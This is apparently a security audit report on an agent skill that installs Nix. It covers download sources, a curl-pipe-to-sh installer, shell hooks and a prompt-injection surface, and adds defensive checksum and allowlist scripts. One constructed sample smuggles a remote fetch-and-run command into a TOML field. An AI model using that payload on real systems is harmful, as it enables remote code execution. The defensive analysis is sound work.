nix-setup
Pass
Audited by Gen Agent Trust Hub on Apr 20, 2026
Risk Level: SAFE
Categories: EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: Fetches system software and tools from verified official repositories and trusted organizations.
  - Downloads Nix binary tarballs from the official NixOS release server (`releases.nixos.org`) inside the `setup_nix.sh` script.
  - Fetches the Agent Package Manager (`apm`) binaries from Microsoft's official GitHub releases via `fetchurl` in `assets/apm.nix`.
- [REMOTE_CODE_EXECUTION]: Provides instructions to install the Nix package manager by piping a script from Determinate Systems directly into the shell. The one-liner executes whatever the server returns; its integrity rests entirely on TLS and on the installer host, with no local checksum or signature check.
  - Evidence: `curl --proto '=https' --tlsv1.2 -sSf -L https://install.determinate.systems/nix | sh -s -- install` in `SKILL.md`.
- [COMMAND_EXECUTION]: Performs environment configuration and tool initialization through shell scripts and Nix shell hooks.
  - The `assets/setup_nix.sh` script modifies system-wide and user-specific Nix configuration files (`nix.conf`) and shell profiles (`/etc/profile.d/nix.sh`) to enable flakes and set up the environment.
  - Language-specific templates (`flake.nix`) use shell hooks to automatically execute commands such as `opam init` (OCaml) and `moon update` (MoonBit) when entering the development shell.
  - Employs `home-manager` modules to declaratively manage user configuration, including shell aliases, git settings, and local package installations.
- [PROMPT_INJECTION]: Contains a surface for indirect instruction injection via automated shell hooks that process local project files.
  - Ingestion points: automatically processes local files such as `moon.mod.json` (MoonBit) and `rust-toolchain.toml` (Rust) in `flake.nix` shell hooks.
  - Boundary markers: none present.
  - Capability inventory: shell hooks can execute arbitrary commands via the `nix develop` command during environment activation.
  - Sanitization: no sanitization is performed on the project-local files before they are used as inputs to automated setup tools.
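A safer way to carry out the installation than the audited `curl | sh` one-liner, shown here as an added example that is not code from the nix-setup skill or from Determinate Systems: download the installer to a file, compare its SHA-256 against a digest pinned out of band, and only then execute it. The URL is the one quoted in the evidence above; the function and variable names are this example's own, and the expected digest must be obtained from the vendor, not from this page.

```shell
#!/bin/sh
# Added example (not part of the nix-setup skill): fetch the installer to a
# file, check a pinned SHA-256, and only then run it. The URL is the one the
# audit quotes; the pinned digest is an input the operator supplies.
set -u

INSTALLER_URL="https://install.determinate.systems/nix"   # quoted in SKILL.md

# sha256_of FILE -> prints the hex digest (sha256sum on Linux, shasum on macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_sha256 FILE EXPECTED -> 0 if the digest matches, 1 otherwise.
verify_sha256() {
    actual=$(sha256_of "$1")
    [ "$actual" = "$2" ]
}

# fetch_installer URL DEST -> same TLS restrictions as the audited one-liner,
# but written to a file instead of piped into sh (needs network).
fetch_installer() {
    curl --proto '=https' --tlsv1.2 -sSf -L -o "$2" "$1"
}

# run_verified_installer FILE EXPECTED [ARGS...] -> refuses to run unless the
# digest matches; otherwise runs the script with ARGS as its positional
# parameters (equivalent to the original `sh -s -- ARGS`).
run_verified_installer() {
    f=$1; expected=$2; shift 2
    if ! verify_sha256 "$f" "$expected"; then
        echo "refusing to run $f: checksum mismatch" >&2
        return 1
    fi
    sh "$f" "$@"
}

# install_nix EXPECTED -> fetch, verify, run "install"; cleans up the temp file.
install_nix() {
    tmp=$(mktemp) || return 1
    fetch_installer "$INSTALLER_URL" "$tmp" || { rm -f "$tmp"; return 1; }
    run_verified_installer "$tmp" "$1" install
    rc=$?
    rm -f "$tmp"
    return $rc
}
```

Usage is `install_nix <sha256-from-vendor>`. The digest has to be recorded in advance (for example in the skill repository, updated deliberately when the installer changes); a digest fetched at run time from the same host adds nothing.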
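The sanitization gap the PROMPT_INJECTION finding describes can be closed by allowlisting what a hook reads before acting on it. The following is an added example, not the skill's own `flake.nix` hook: it extracts the `channel` value from a project's `rust-toolchain.toml` with a fixed pattern and accepts only rustup channel names, so that a project file carrying a command substitution or shell metacharacters never reaches a tool invocation. Both TOML samples are constructed for the example; `rustup` is named as the assumed consumer but is not invoked.

```shell
#!/bin/sh
# Added example (not part of the nix-setup skill): allowlist the toolchain
# channel read from rust-toolchain.toml before a shell hook uses it.
set -u

# toolchain_channel FILE -> prints the value of the first `channel = "..."`
# line, or nothing if absent. Fixed sed pattern; the value is never evaluated.
toolchain_channel() {
    sed -n 's/^[[:space:]]*channel[[:space:]]*=[[:space:]]*"\([^"]*\)".*/\1/p' "$1" | head -n 1
}

# valid_channel VALUE -> 0 only for rustup channel names:
# stable|beta|nightly, optionally suffixed -YYYY-MM-DD, or a version like 1.78.0.
valid_channel() {
    printf '%s\n' "$1" | grep -Eq '^((stable|beta|nightly)(-[0-9]{4}-[0-9]{2}-[0-9]{2})?|[0-9]+\.[0-9]+(\.[0-9]+)?)$'
}

# checked_channel FILE -> prints the channel if it passes the allowlist,
# otherwise reports and returns 1. A shellHook would then run, for example,
#   rustup toolchain install "$(checked_channel rust-toolchain.toml)"
# only when this succeeds (rustup is assumed here, not called).
checked_channel() {
    ch=$(toolchain_channel "$1")
    if [ -z "$ch" ]; then
        echo "no channel in $1" >&2
        return 1
    fi
    if ! valid_channel "$ch"; then
        echo "rejecting channel from $1: $ch" >&2
        return 1
    fi
    printf '%s\n' "$ch"
}

# Constructed samples: a benign file, and one whose channel would run a
# command if a hook expanded it through eval or an unquoted substitution.
BENIGN_TOML='[toolchain]
channel = "nightly-2024-05-01"
components = ["rustfmt"]'

MALICIOUS_TOML='[toolchain]
channel = "$(curl https://example.invalid/x | sh)"'
```

The same pattern applies to the `moon.mod.json` ingestion point: extract the one field the hook needs with a fixed parser, validate it against the format the consuming tool documents, and treat anything else as a refusal rather than something to pass through.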
Audit Metadata